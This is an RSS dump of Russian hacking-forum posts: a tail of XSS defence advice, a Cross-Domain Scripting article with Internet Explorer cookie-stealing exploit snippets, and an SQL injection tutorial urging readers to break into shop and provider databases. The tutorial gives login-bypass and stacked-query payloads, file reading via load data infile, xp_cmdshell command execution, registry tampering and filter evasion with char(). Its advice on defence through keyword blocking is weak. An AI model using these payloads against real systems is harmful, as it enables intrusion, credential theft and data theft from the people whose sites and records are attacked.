						&lt;p&gt;&amp;#160; &amp;#160; Что касается защиты от подобного рада атак, так тут все вообще просто. Весь секрет состоит в том, чтобы перед печатью переменных максимально их обезопасить. Можно перевести их в html знаки. В php это можно сделать вот так:&lt;/p&gt;
						&lt;p&gt;$login = htmlspecialchars($login);&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Или можно просто удалить все теги из логина:&lt;/p&gt;
						&lt;p&gt;$login=strip_tags($login);&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:48:53 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=23#p23</guid>
		</item>
		<item>
			<title>Cross Domain Scripting</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=22#p22</link>
			<description>&lt;p&gt;Что такое Cross Domain Scripting?&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Изначально Cross-Domain Scripting (CDS) был связан с недостатками в модели безопасности всем известного «ослика» aka Internet Explorer (IE). Однако, т.к. архитектурные особенности современных браузеров не сильно отличаются друг от друга, то атакам данного типа в настоящее время подвержены практически все известные веб-браузеры. Тем не менее, существующие отличия между программами этого класса приводят к тому, что чаще всего найденный CDS является «браузерозависимым», т.е., например, работает на IE, но не работает на Opera или наоборот.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В основе уязвимостей типа CDS лежит понятие «домена». В данном контексте смысл этого понятия несколько отличается от общепринятого. «Домен» - это уже не просто адрес сайта в Интернете, и даже не «область пространства иерархических имен сети Интернет», - данное понятие обозначает некоторую «границу безопасности» (security boundary), выходить за которую не разрешено ни одному пользовательскому скрипту.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В основе модели безопасности любого веб-браузера лежит тот принцип, что ресурсы различных доменов (странички, скрипты и т.д.) не могут никоим образом пересекаться друг с другом, т.е. получать доступ к внутреннему содержимому и данным друг друга. Если бы это было возможно, то, например, скрипт на домашней страничке юного хакера Васи мог бы получить доступ к данным почтового ящика на Mail.Ru ничего не подозревающего пользователя, которого Вася заманил на свою страничку. Вот было бы веселье:)! Более того, согласно архитектуре Windows и концепциям построения современных браузеров, любой сетевой ресурс в локальной сети и собственная файловая система клиента это тоже «домены», а значит к ним возможно обращение из скриптов точно так же, как к любому ресурсу в Интернете! Собственно именно локальная файловая система клиента и является чаще всего целью cross-domain атак.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В тоже время взаимодействие между собой ресурсов (страничек и скриптов) внутри домена (и всех его субдоменов!) концепцией безопасности Microsoft разрешено и в принципе никак не ограничено. Трудно судить правильно это или нет, но то, что так проще:) и при этом расширяются возможности веб-серфинга, - это точно.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Так что же такое Cross-Domain Scripting? В контексте всего вышесказанного этот термин можно перевести как – «междоменный скриптинг», т.е. «пересечение скриптом границ домена» - нарушение той заветной линии безопасности, выход за которую дает доступ к данным других доменов, в том числе к локальной файловой системе клиента. Такое нарушение чаще всего сопровождается возможностью записывать и выполнять произвольный HTML и Java код в контексте других доменов, читать данные других доменов (например, формы с паролями или файлы на системе клиента) и даже выполнять произвольные команды на удаленном компьютере.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Часто понятие «cross-domain scripting» подменяют понятием «cross site scripting» (XSS). Действительно, зачастую бывает, что внешние проявления этих уязвимостей очень похожи, - особенно, когда в результате CDS происходит вставка Java-кода в контекст другого домена. Однако, несмотря на сходство, суть этих уязвимостей различна:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Во-первых, область действия XSS по определению ограничена одним доменом. В то время, как CDS в общем случае подвержены все домены + локальная файловая система клиента.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Во-вторых, причина XSS уязвимостей кроется в ошибках скриптов, расположенных на сервере, и, как правило, заключается в недостаточной фильтрации данных, полученных от пользователя. Источник CDS уязвимостей – клиентское программное обеспечение (браузер и операционная система), и он обычно никак не связан с пользовательскими данными.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ну и не надо забывать, что уровень опасности от успешной эксплуатации злоумышленником XSS намного ниже, чем от CDS. Ведь в первом случае, как максимум, произойдет утечка конфиденциальных данных пользователя (пароли и т.д.), причем лишь с одного сайта, а при CDS возможно похищение конфиденциальный данных с любых сайтов, а зачастую и исполнение произвольных команд на системе клиента, что позволяет взять над ней полный контроль.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Подробнее об XSS можно почитать Antichat.Ru.&lt;/p&gt;
						&lt;p&gt;Как это работает?&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Так почему же становится возможным данный тип атак? Причина заключается в том, что та самая «линия безопасности» между доменами создается искусственно, что всю работу по предотвращению междоменного скриптинга выполняет веб-браузер и его компоненты – нет архитектурных ограничений. А значит, всегда есть вероятность ошибки в процедурах проверки, возможность их обойти, что в настоящее время с успехом и делается.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; За более чем десятилетнюю историю использования веб-браузеров было найдено множество способов преодолеть заветную границу домена. Однако большинство из них можно условно разделить на два класса:&lt;/p&gt;
						&lt;p&gt;1.Эксплуатация ошибок безопасности в объектно-ориентированной модели браузеров;&lt;/p&gt;
						&lt;p&gt;2.Использование промежуточного звена для выполнения атаки.&lt;/p&gt;
						&lt;p&gt;Рассмотрим подробнее данные классы атак.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В основе первого лежит ярко выраженная объектно-ориентированная архитектура современных браузеров и виртуальной машины Java. Действительно, все, что мы видим на экране веб-браузера, это объекты определенных классов с их свойствами, событиями и методами. Используя эту объектно-ориентированную модель и скрипты Java, мы можем обращаться к любому элементу загруженной в браузер странички, читать и записывать в неё данные, открывать новые окна и т.д. Более того, с помощью скриптов возможно частичное управление элементами самого веб-браузера и даже действиями пользователя: перемещение «Вперед»/«Назад» по страничкам, добавление в «Избранное» и т.п.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Однако отдельные окна или элементы странички в веб-браузере могут принадлежать разным доменам, а значит нужно пресекать обращение к ним. Нельзя допустить, чтобы пользовательский скрипт, открыв другой домен в новом окне браузера, имел возможность что-либо записать туда или считать оттуда. Нельзя допустить, чтобы скрипт на страничке с фреймом, куда подгружен ресурс с другого домена, смог обращаться к этому фрейму и получать доступ к его данным. Более того, утечка данных от одного домена к другому возможна не только через свойства, но и через методы и события объектов! Скажем скрипт на страничке юного хакера Васи, куда он заманил ничего не подозревающего пользователя, не должен «знать» какие клавиши тот нажимает, когда вводит пароль для входа в Mail.Ru, открытый в другом окне браузера. Ну и таких примеров можно привести очень много!&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; К сожалению, а может и к счастью;), такие проверки безопасности зачастую выполняются некорректно, а иногда и отсутствуют вовсе! Поэтому становится возможным обращаться к элементам страничек с других доменов, считывать из них данные, записывать свой Java код в контекст других доменов и т.д. Из-за достаточно сложной архитектуры объектно-ориентированной модели такие «дырки» в ней находятся довольно часто. Ниже приведен пример данного класса атак (Пример 1).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для выполнения атак второго класса используется некоторое промежуточное звено. Что делать, когда прямое обращение к другому домену запрещено? Правильно! Идти в обход! А вдруг есть кто-то иди что-то, кому это обращение не запрещено, и оно сможет считать оттуда данные и передать нам, или наоборот – записать наши данные в контекст другого домена. Наиболее уязвимой с этой точки зрения оказывается технология ActiveX от Microsoft. Технология ActiveX предоставляет в распоряжение пользователя объекты, их свойства и методы, которые используются операционной системой для каких-либо вспомогательных целей. Например, для просмотра через веб-браузер файлов справки Windows (*.chm) используется HTML Help ActiveX компонент. Не правда ли удобно? Однако зачастую объекты ActiveX выполняют роль своего рода «троянских коней»! Дело в том, что существует способ управлять этими компонентами (загружать, обращаться к их свойствам и методам) через веб-страничку. Для этого используется тег . А ведь зачастую эти ActiveX объекты содержат методы манипуляций с файловой системой, запуска приложений, навигации по веб-страницам и т.д. Т.о. появляется возможность извне производить все эти действия и более того осуществлять полноценный обмен данными с жертвой! Например, читать содержимое локальных файлов клиента и отправлять обратно скрипту эти данные, или с помощью ActiveX объекта открывать другой домен и записывать в его контекст свой Java код. Именно с помощью данного класса атак иногда удается добиться выполнения произвольного кода (запуска cmd.exe с нужными параметрами) на системе клиента. В настоящее время данный тип CDS также широко распространен и постоянно находят новые уязвимые ActiveX объекты. Ниже приведен пример такой уязвимости (Пример 2).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Кроме рассмотренных классов CDS существуют и другие способы обхода междоменных ограничений. Правда, зачастую эти способы являются весьма экзотическими и встречаются нечасто. Например, обнаруженная в июле 2004 года Cross-Cookie уязвимость (&lt;a href=&quot;http://www.westpoint.ltd.uk/advisories/wp-04-0001.txt&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.westpoint.ltd.uk/advisories/wp-04-0001.txt&lt;/a&gt;). Она позволяла при определенных условиях получать доступ (читать/записывать) к кукам других доменов. Причем это был один из немногих случаев, когда уязвимыми оказались многие браузеры: IE, Mozilla, Opera, Konqueror.&lt;br /&gt;Т.о. CDS является в настоящее время очень распространенным типом атак и постоянно обнаруживаются новые способы эксплуатации этих уязвимостей («вектора атак»).&lt;/p&gt;
						&lt;p&gt;Примеры CDS&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Чтобы все описанное выше было понятней – рассмотрим пару примеров реальных CDS уязвимостей. Все они были найдены в Internet Explorer и позволяют вставлять свой Java код в контекст других доменов. Обычно это используется для хищения кукисов или выполнения произвольных действий в рамках текущей сессии пользователя.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример 1. Similar Method Name Redirection Cross Domain Vulnerability – CAN-2004-0727 (MS04-038)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта уязвимость была обнаружена в июле 2004 года и связана ошибкой безопасности в объектно-ориентированной модели IE (1-ый класс CDS уязвимостей из рассмотренных выше).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Суть её в следующем. Как известно, чтобы загрузить в текущее окно браузера другую страницу (возможно из другого домена), можно использовать свойство location.href или метод location.assign(). Однако, после загрузки требуемой страницы дальнейшее исполнение Java кода текущего скрипта невозможно – иначе скрипт мог бы подгрузить Mail.Ru и выполнить в контексте этого домена произвольные действия. Однако оказалось возможным обойти это ограничение путем редиректа (перенаправления) метода location.assign() на точно такой же, но другого окна (ведь у нас объектно-ориентированная модель и мы можем присваивать методы различных объектов друг другу). В результате появилась возможность исполнять Java код в контексте текущего окна, но уже после загрузки требуемой странички – что и требовалось! Следующий скрипт выполняет требуемые действия:&lt;/p&gt;
						&lt;p&gt;w=window.open(&amp;quot;jаvascript:setInterval(function(){try{x=opener.location.href;}catch(e){location.assign(&#039;jаvascript:alert(document.cookie)&#039;);window.close();}},100)&amp;quot;);&lt;br /&gt;w.location.assign=location.assign;&lt;br /&gt;location.href=&amp;quot;http://localhost&amp;quot;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вначале открывается новое окно, которое в цикле ждет загрузки странички (в нашем случае с localhost) в главное(текущее) окно. Тем временем скрипт переназначает методы location.assign() и начинает загрузку в главное окно требуемой страницы (localhost). Как только загрузка заканчивается, в цикле нового окна срабатывает триггер, методом assign() вставляется Jаva код (из-за переназначения методов вставка происходит в контекст главного окна) и новое окно тут же закрывается. В результате выполнения скрипта в контексте localhost исполняется dоcument.cookie.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Видимо разработчики Microsoft не предусмотрели возможность редиректа функций и не вставили проверку безопасности (или вставили некорректно) в данное событие. Для эксплуатации данной уязвимости необходимо, чтобы в браузере был разрешен Active scripting. Почитать подробнее об этой уязвимости и найти рабочий пример эксплойта вы можете здесь: &lt;a href=&quot;http://greyhatsecurity.org/similarmethodnameredir-discussion.htm.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://greyhatsecurity.org/similarmetho &amp;#8230; ssion.htm.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Пример 2. DHTML Editing Component ActiveX Control Cross Domain Vulnerability CAN-2004-1319 (MS05-013)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Данная уязвимость была обнаружена в конце прошлого года, но исправлена лишь в феврале. Она относится ко 2-ому типу CDS атак из рассмотренных выше, т.е. использует промежуточное звено (DHTML ActiveX) для проведения атаки. Для успешной эксплуатации уязвимости необходимо выполнить следующую последовательность действий:&lt;/p&gt;
						&lt;p&gt;1.Загрузить DHTML ActiveX. Это делается при помощи тега .&lt;/p&gt;
						&lt;p&gt;2.Загрузить в ActiveX объект нужную нам страницу (произвольный домен). Это делается путем выполнения в контексте DHTML ActiveX нашего скрипта.&lt;/p&gt;
						&lt;p&gt;exploit.DOM.Sсript.execSсript(&amp;quot;window.name=&amp;quot;new&amp;quot;;open(&amp;quot;http://localhost&amp;quot;,&amp;quot;new&amp;quot;);&amp;quot;);&lt;/p&gt;
						&lt;p&gt;3.Ну а после этого уже можно вставлять наш HTML и Java код. Он будет выполняться в контексте загруженного домена. Все просто до безобразия:)!&lt;/p&gt;
						&lt;p&gt;exploit.DOM.Sсript.execSсript(&amp;quot;alert(document.cookie)&amp;quot;);&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Каковы же причины данной уязвимости? Я бы выделил их две:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Во-первых, возможность извне выполнять произвольные скрипты внутри ActiveX объекта – на мой взгляд, это слишком большая вольность!&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Во-вторых, при загрузке страницы в DHTML ActiveX туда загружается ВСЁ – даже кукисы! Вопрос: зачем? Данный ActiveX объект может использоваться для редактирования страниц и зачем там нужны кукисы – непонятно…&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Естественно, для эксплуатации этой уязвимости необходимо, чтобы в браузере было разрешено выполнение ActiveX. Почитать подробнее об этой уязвимости и найти рабочий пример эксплойта вы можете здесь: &lt;a href=&quot;http://greyhatsecurity.org/abusiveparent-discussion.htm.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://greyhatsecurity.org/abusiveparen &amp;#8230; ssion.htm.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Как защититься?&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Защититься от междоменного скриптинга не так просто. Т.к. варианты эксплуатации («вектора атак») этих уязвимостей очень разнообразны, то большинство мер будут иметь весьма ограниченный и временный характер. Перекрыть все «вектора атак» практически невозможно. Поэтому я дам несколько рекомендаций, которые способны лишь снизить риск успешной атаки, но не защитить полностью.&lt;/p&gt;
						&lt;p&gt;1.Соблюдение осторожности при веб-серфинге.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для успешного выполнения почти всех разновидностей CDS необходимо вначале заманить ничего не подозревающего пользователя на страницу-эксплойт, после чего он подвергнется данной атаке. Нельзя доверять ссылкам, как бы невзначай, подкинутым в разговоре, различным «домашним страницам» и т.п. Это наверное главная рекомендация из всех. К сожалению грамотно примененная XSS может перечеркнуть всю осторожность.&lt;/p&gt;
						&lt;p&gt;2.Оперативная установка заплаток для операционной системы и браузера.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Обычно для всех опубликованных в Интернете уязвимостей производитель (даже Microsoft:)) в короткие сроки выпускает исправление (заплатку). Оно защитит от данной конкретной уязвимости, но не от других, еще не найденныхJ (или найденных, но не приданных огласке). Естественно, рассмотренные в примерах уязвимости уже давно исправлены Microsoft, и кто захотел, тот уже позаботился о своей безопасности.&lt;/p&gt;
						&lt;p&gt;3.Отключение в браузере ActiveX и Active Scripting.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта мера сделает невозможным запуск в бразере ActiveX и выполнение Java или VBS скриптов. Это действительно сделает неэффективными большинство CDS атак, правда может существенно отразиться на функциональности посещаемых сайтов. Однако не всегда CDS для успешной атаки требует поддержки от браузера ActiveX или Active Scripting – и это не панацея от всех бед!&lt;br /&gt;4.Работа в Интернете только с ограниченными правами.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Выполнение этой рекомендации позволит, даже в случае успешной атаки, снизить возможный ущерб от неё. Как известно браузер (а значит и все скрипты в нем) запускается с правами текущего пользователя. Не дайте хакеру Васе получить cmd.exe с правами Администратора:)!&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Следование всем этим рекомендациям поможет стать трудноуязвимым для Cross-Domain Scripting!&lt;/p&gt;
						&lt;p&gt;Заключение.&lt;/p&gt;
						&lt;p&gt;Вот пожалуй и все, что я хотел рассказать об атаках класса Cross-Domain Scripting. Надеюсь, после прочтения данной статьи, новички не будут больше спрашивать: «Что такое Cross-Domain Scripting и с чем его едят? Объясни, плииз!», а пойдут искать CDS уязвимости в IE:). Я думаю, их там еще достаточно!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:47:16 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=22#p22</guid>
		</item>
		<item>
			<title>SQL Injection/Взлом MySQL</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=21#p21</link>
			<description>&lt;p&gt;А тебе когда нибудь хотелось поиметь базу данных какого-нибудь иНет-магазина или БД твоего прова со списком всех юзверей? Если да, то читай эту статью и хакай на здоровье =). Мы будем юзать технику взлома SQL Injection.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; По статистике в Интернете около 60% приложений, работающих с различного рода БД, подвержены атакам, позволяющим модифицировать запрос к БД и заставить ее работать не совсем корректно. И этот класс атак называется SQL Injection атаками. Эта уязвимость не просто повсеместно распространена, она есть даже в таких неприступных крепостях, как серверы статистики многих провайдеров.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для проверки приложения на вшивость (например, скрипта какого-нибудь сервера-статистики) сначала корректно заполни все поля для ввода, а потом по очереди подставляй в конец каждого поля кавычку (&#039;). Если после отправки заполненной таким корявым образом формы на сервер тебе выпрыгнет сообщение об ошибке&lt;/p&gt;
						&lt;p&gt;Microsoft OLE DB Provider for ODBC Drivers (0x8004CC14)&lt;br /&gt;[Microdoft][ODBC SQL &lt;br /&gt;Server Driver][SQL Server][Unclosed&lt;br /&gt;quotation mark before the character &lt;br /&gt;string &amp;quot;)&#039;.&lt;br /&gt;/default.asp, line 239&lt;/p&gt;
						&lt;p&gt;или что-нибудь очень похожее, то мы на верном пути и флаг нам в руки.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь представим, как идет обмен данными между SQL-сервером и нашим глючным приложением. Вот тебе уязвимый кусочек asp-&lt;br /&gt;кода, не запрещающий sql injection:&lt;/p&gt;
						&lt;p&gt;var sql = &amp;quot;select * from users where&lt;br /&gt;username = &#039;&amp;quot; + username + &amp;quot;&#039; and &lt;br /&gt;password = &#039;&amp;quot; + password + &amp;quot;&#039;&amp;quot;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Таким образом, если username=hacker и password=qwerty, то все сработает корректно и без ошибок и asp-скрипт передаст SQL- серверу команду&lt;/p&gt;
						&lt;p&gt;select * from users where username=&#039;hacker&#039; and password=&#039;qwerty&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Но если мы наглым образом сделаем своим именем пользователя hacker&#039;, то команда станет такой:&lt;/p&gt;
						&lt;p&gt;select * from users where username=&#039;qwerty&#039;&#039; and password=&#039;qwerty&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; После этого запроса SQL глюканет и выдаст нам ошибку, мол мы кавычек слишком много насажали. Теперь будем думать логически: нам нужно обойти проверку имени и пароля в этом скрипте, т.е. отбросить кусок запроса &amp;quot;and password=&#039;qwerty&#039;&amp;quot;. Разработчики SQL все уже придумали до нас, и нам всего лишь остается закомментировать этот хвост. В языке SQL все комментарии начинаются с двух минусов (--), и все, что идет после них, сервер в расчет не берет; т.е. чтобы заставить рассмотренный выше кусочек asp&#039;a пустить нас без пароля вместо юзернейма &amp;quot;hacker&amp;quot;, надо будет вписать вот такую байду:&lt;/p&gt;
						&lt;p&gt;hacker&#039;; --&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь разберемся, какой символ что тут означает. Кавычка после hacker закрывает поле username; точка с запятой говорит, что в данный момент у нас это конец всей команды; а два минуса показывают, что можно забить на все идущее после них.&lt;/p&gt;
						&lt;p&gt;Смотрим кишки базы&lt;br /&gt;&amp;#160; &amp;#160; Так, без пароля нас уже пускают, но это еще не все, что можно сотворить с атакуемой машиной. Для начала нам нужно узнать, какие базы данных есть на удаленной машине. Чтобы это узнать, возвращаемся к нашему полю для ввода username&#039;a и пишем туда такую вещь:&lt;/p&gt;
						&lt;p&gt;&amp;quot;hacker&#039;; show databases; --&amp;quot; (опять же без кавычек)&lt;/p&gt;
						&lt;p&gt;Если после отправки такой формы на сервер тебе вывалится списочек, чем-то похожий на этот:&lt;/p&gt;
						&lt;p&gt;mysql&amp;gt; show databases;&lt;/p&gt;
						&lt;p&gt;+----------+&lt;br /&gt;| Database |&lt;br /&gt;+----------+&lt;br /&gt;| MYSQL |&lt;br /&gt;| TEST |&lt;br /&gt;| hacker |&lt;br /&gt;+----------+&amp;gt;&lt;/p&gt;
						&lt;p&gt;3 rows in set (0.00 sec)&lt;/p&gt;
						&lt;p&gt;то мы не просто на верном пути, мы лошадиными шагами движемся к получению свопа всех баз данных на сервере. Я думаю, посланную команду подробно разбирать не надо, тут все не сложно, только одна маленькая заметка: в языке SQL в одной строчке может быть несколько команд, разделенных точками с запятыми. Этим-то мы в основном пользоваться и будем.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; После того как мы узнали список баз данных, нам нужно увидеть список таблиц в каждой из них. Чтобы осуществить такую задумку, в поле username пишем:&lt;/p&gt;
						&lt;p&gt;&amp;quot;hacker&#039;; use mysql; show tables; -- &amp;quot;&lt;br /&gt;&amp;quot;hacker&#039;; use test; show tables; -- &amp;quot;&lt;br /&gt;&amp;quot;hacker&#039;; use voy; show tables; -- &amp;quot;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда use в данном случае заставляет SQL переключиться на заданную базу данных, а команда show tables показывает нам список всех таблиц в этой базе данных.&lt;/p&gt;
						&lt;p&gt;Тащим любые файлы с сервера&lt;br /&gt;&amp;#160; &amp;#160; Так, структуру БД на удаленной машине узнали, теперь осталось поиметь всю информацию. Для осуществления этого противозаконного действия опять в поле username пишем:&lt;/p&gt;
						&lt;p&gt;&amp;quot;hacker&#039;; select * from table1; -- &amp;quot; (где table1 - существующая таблица в БД)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; И вот таким макаром по очереди сливаем информацию из каждой таблицы.&lt;br /&gt;В принципе на такой удаче можно остановиться, но SQL - безграничное поле для всяких извращений. Ее можно заставить вытворять все, что душе пожелается - от чтения любого файла с диска до работы с реестром в виндах.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для первого раза попробуем схватить какой-нибудь файл с диска. Для этого тебе нужны будут права на создание таблиц и запись в них. Сначала создадим подопытную таблицу, при помощи которой будем хватать любой файл с диска. Создаем ее уже привычным способом: в поле username пихаем:&lt;/p&gt;
						&lt;p&gt;&amp;quot;hacker&#039;; create table dead_gibbon (tab1 varchar(200), tab2 varchar(200), tab3 varchar(200));&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вот мы создали таблицу с тремя столбцами. Небольшой комментарий: выражение &amp;quot;tab1 varchar(200)&amp;quot; говорит, что надо создать столбец с именем tab1 и максимальным значением 200. Теперь осталось воткнуть в свежесозданную таблицу требуемый файл&lt;br /&gt;&amp;quot;hacker&#039;; load data infile &amp;quot;/../../../../boot.ini&amp;quot; into table dead_gibbon; -- &amp;quot;&lt;br /&gt;и посмотреть, что же у нас получилось:&lt;br /&gt;&amp;quot;hacker&#039;; select * from dead_gibbon; -- &amp;quot;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Конечно, файл в таблице окажется не в лучшем своем состоянии, каждая новая строчка файла будет эквивалентна каждой новой строчке в таблице, но в принципе даже этого хватает, чтобы таскать с сервера не очень большие файлы.&lt;/p&gt;
						&lt;p&gt;Выполняем любые команды&lt;br /&gt;&amp;#160; &amp;#160; Файлы с диска читать научились, теперь осталось добиться командной строки на сервере. Такую задачу можно достичь только на SQL-серверах небезызвестной компании Microsoft. Именно при помощи MsSQL любой версии на удаленной машине можно исполнять любые команды. Для этого нужно отослать на сервер команду&lt;/p&gt;
						&lt;p&gt;exec master..xp_cmdshell &#039;dir&#039;&lt;/p&gt;
						&lt;p&gt;и этим самым увидеть листинг текущей директории. Но это еще не все! Ребятки из Майкрософта постарались на славу и даже подключили к серверу возможность работы с реестром. Например:&lt;/p&gt;
						&lt;p&gt;exec xp_regread HKEY_LOCAL_MACHINE, &#039;SYSTEMCurrentControlSetServiceslanmanserverparameters&#039;, &lt;br /&gt;&#039;nullsessionshares&#039;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Это всего лишь пример, а вот список всех команд, позволяющих творить с реестром такие кренделя, которые сам создатель на этапе компиляции не задумывал:&lt;/p&gt;
						&lt;p&gt;xp_regaddmultistring (добавляем строковый параметр)&lt;br /&gt;xp_regdeletekey (удаляем ключ)&lt;br /&gt;xp_regdeletevalue (удаляем значение ключа)&lt;br /&gt;xp_regread (читаем ключ)&lt;br /&gt;xp_regremovemultistring (удаляем строковый параметр)&lt;br /&gt;xp_regwrite (пишем информацию в реестр)&lt;/p&gt;
						&lt;p&gt;Это далеко не весь список заподлянских команд. Все остальные ты сможешь прочитать в документации к серверу.&lt;/p&gt;
						&lt;p&gt;Защита&lt;br /&gt;&amp;#160; &amp;#160; Так, хватит мусолить классические случаи SQL-injection атак, ведь в природе есть люди, пытающиеся защититься от такого рода атак. Но опять же язык SQL имеет такое количество исключений и примочек, что запретить их все просто теоретически нельзя. Есть только один метод защиты - разрешить для ввода только символы ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz1234567890, а также запретить ключевые слова SQL &amp;quot;select, use, drop, insert и т.д.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; По моему мнению, так и только так должна выглядеть защита от SQL-injection атак. Остальные методы (например, запрещение только ключевых слов и метасимволов &amp;quot;;&amp;quot; и &amp;quot;&#039;&amp;quot;) обходятся достаточно грациозно. Если скрипт отфильтровывает какой-либо символ, то его можно заменить конструкцией +char(0xКОД_СИМВОЛА)+. Теперь конструкция для вывода содержимого БД без использования кавычек будет выглядеть так:&lt;/p&gt;
						&lt;p&gt;select user from user where char(0x27)+user+char(0x27)=char(0x27)+char(0x27);&lt;/p&gt;
						&lt;p&gt;что абсолютно эквивалентно вот этой вещи:&lt;/p&gt;
						&lt;p&gt;select user from user where &#039;user&#039;=&#039;&#039;;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ну, я думаю, для первого раза хватит. После того как переваришь всю полученную информацию, запомни, что базы данных используются в самых желанных местах для взломщиков - SQL встречается в музыкальных архивах, у провайдеров, в онлайн- магазинах, в банках... Дальше список продолжать? Базы данных - это всегда лакомый кусочек, который никто не прочь урвать.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; И еще на будущее: об SQL injection слышали далеко не все админы, так что если найдешь таковую уязвимость на каком-нибудь более-менее крупном сайте, то не спеши устраивать акты вандализма на месте преступления.&lt;/p&gt;
						&lt;p&gt;Взято с &lt;a href=&quot;http://cyberpunks.h10.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cyberpunks.h10.ru/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:45:31 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=21#p21</guid>
		</item>
		<item>
			<title>Долбим SQL’ные базы данных</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=20#p20</link>
			<description>&lt;p&gt;SQL Injection howto&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Не секрет, что баги в скриптах всегда были ахиллесовой пятой многих веб-ресурсов. Просканишь хост, посмотришь, какие сервисы и каких версий там крутятся, и опускаешь руки - просто неоткуда подступиться. Все лишнее закрыто фаерволом, а то, что открыто - пропатчено до последних версий. Засекурено по максимуму. И тут исход взлома решает какая-то байда в скрипте, заставляющая прыгать от радости.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Итак, сегодня на повестке дня - техника взлома скриптов, почти по-наркомански называемая SQL injection. Для понимания всех прелестей этой фишки неплохо бы немного знать, что такое SQL, или, по-нашему, скуль. Об этом очень кратко читай в следующих абзацах.&lt;/p&gt;
						&lt;p&gt;Ликбез по SQL&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Язык SQL (Structured Query Language) на сегодняшний день является стандартом де-факто практически для всех распространенных серьезных СУБД. Он предназначен для составления запросов к базе данных. Запросы могут иметь цель добавить некоторые данные в базу, их модификацию, поиск и т.д. Работает это следующим образом. На языке SQL составляется некоторое выражение (запрос). Затем оно передается серверу базы данных, который, в свою очередь, обрабатывает его и возвращает результат этой обработки программе, сделавшей запрос.&lt;/p&gt;
